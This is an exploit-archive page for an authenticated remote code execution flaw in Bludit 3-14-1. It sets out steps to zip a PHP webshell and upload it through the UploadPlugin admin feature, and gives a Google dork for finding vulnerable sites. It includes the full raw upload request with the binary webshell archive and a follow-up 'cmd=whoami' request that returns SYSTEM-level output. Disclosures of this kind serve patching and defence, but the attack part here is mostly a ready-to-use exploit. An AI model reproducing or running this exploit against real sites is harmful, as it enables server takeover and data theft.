Bludit 3-14-1 Shell Upload

Bludit 3-14-1 Shell Upload: Posted Mar 31, 2023; Authored by Alperen Ergel; Bludit version 3-14-1 suffers from a remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | f5baef0a0f9582f9e9b79f39070eaecf02e29c6dea03fc9562e5f4a59969f8c3; Download | Favorite | View

Bludit 3-14-1 Shell Upload

# Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.bludit.com/
# Version : 3-14-1
# Tested on: windows 11 wampserver | Kali linux
# Category: WebApp
# Google Dork: intext:'2022 Powered by Bludit'
# Date: 8.12.2022
######## Description ########
#
#  Step 1 : Archive as a zip your webshell (example: payload.zip)
#  Step 2 : Login admin account and download 'UploadPlugin'
#  Step 3 : Go to UploadPlugin section
#  Step 4 : Upload your zip
#  Step 5 : target/bl-plugins/[your_payload]
#
######## Proof of Concept ########


==============> START REQUEST <========================================

POST /admin/plugin/uploadplugin HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264
Content-Length: 1820
Origin: https://036e-88-235-222-210.eu.ngrok.io
Dnt: 1
Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="tokenCSRF"

b6487f985b68f2ac2c2d79b4428dda44696d6231
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="pluginorthemes"

plugins
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="zip_file"; filename="a.zip"
Content-Type: application/zip

PK    †eˆU               a/PK   ”fˆUÆ  ª)¢  Ä
      a/a.phpíVÛŽÓ0}ç+La BÛìVÜ–pX®ËJ @Vêº!µƒíÒrûwl7É$mQyà‘<$©çÌÌ93ã¸È]ƒË·ï–óÒ=/.&nbsp;pÝãZ+M5/•¶BÎÈ0>©M†[jÅ‚ÓB,„õtOÌ¤Òœ.
×4;’†e)¨ƒ¼È×”¯9[Z¡dðÆ  „Œ&Âd<ó`÷+œN—’y¼Á
RLÉE¾(í7â}âø‡_‡¥æ3OºÈ'xð>A¯p‚pânÁã¤ëÀ×e¡&œük£‹¼$Øj±ØFýâ…á@\@ªgxD¢Ì'áôæQ?½v£ŸöG7ñùZgéññõ“
j±u
\õ„±†à/ï¾ÎÞž´×T™HÄZu™jœHkª‰È£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú„Ä(ŽQK*Ë"Öï¡£;—Ò²·6z²ZŸgXÊò¢ðíÄ'éûù+ñÌ%
µj,ÐäàN°ùf,_à8—“‹•[³˜lO€ScsmI«‡¬«H»¯*Sc?i”)i¹´&x@.'”<—¤Ûç]zs^a®·)‚hBz0;f rì‰þÇ¸0yÕU¥H"ÕÕÿI  IØ\“t{có~€J©£ªä²Ë Ö÷š;dÁ³âÙlh†»s%Ç  Ö8Nº+«}+ŽÿaºržŸŸžÂÂj.
îvWS²A¿O?nHO?›jžO ¤Ã£Q+ì¯æí^ Ï
e8©ô*Ô¾"ý¡@Ó2+ëÂ`÷
kC57j©'Î"m
 ã®ho¹ xŸô Û;’œcçzÙQ
Ë·[kô¿Ý¯-2ì~¨“æv©¥C€î‘Tþ#k2,UØSŽ¦€OÁS£Øg˜‚úK †QˆÜ  ØIÏ²òÖ`Ð:%F½$A"t;buOMr4Ýè~–eãÎ™åØXíÇm˜Ç(s 6A¸3,l>º…<N®¦q{s __~tÂ6á¾,…ÅèçO´ÇÆ×Î£v²±ãÿbÃ‘Ú’‘Ug[;pq›eÓÜÅØÿéJ
Ë}êv‚3ð8´# ŠOµsÈO«ýbƒh±ï°Ÿd—Ë…¹ÿˆ>yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_D Ø0ìu’õv'§öø?@‡ êûOæh'˜Oœ8f—D¼5[à²=b~PK?    †eˆU             $       €íA    a/
          þš®,
Ù þš®,
Ù€ø¨j.
ÙPK?   ”fˆUÆ  ª)¢  Ä
    $        €¤    a/a.php
          ¤eÝ-
Ù ÷C-
Ù bj.
ÙPK         ç    
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="submit"

Upload
-----------------------------308003478615795926433430552264--


==============> END REQUEST <========================================

## WEB SHELL UPLOADED!

==============> START RESPONSE <========================================

HTTP/2 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:01:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4
Pragma: no-cache
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: Bludit
.
.
.
.

==============> END RESPONSE <========================================

# REQUEST THE WEB SHELL

==============> START REQUEST <========================================

GET /bl-plugins/a/a.php?cmd=whoami HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

==============> END REQUEST <========================================

==============> START RESPONSE <========================================

HTTP/2 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:13:14 GMT
Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: PHP/7.4.26
Content-Length: 32

<pre>nt authority\system
</pre>

==============> END RESPONSE <========================================

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Bludit 3-14-1 Shell Upload

Bludit 3-14-1 Shell Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Bludit 3-14-1 Shell Upload

Share This

Bludit 3-14-1 Shell Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems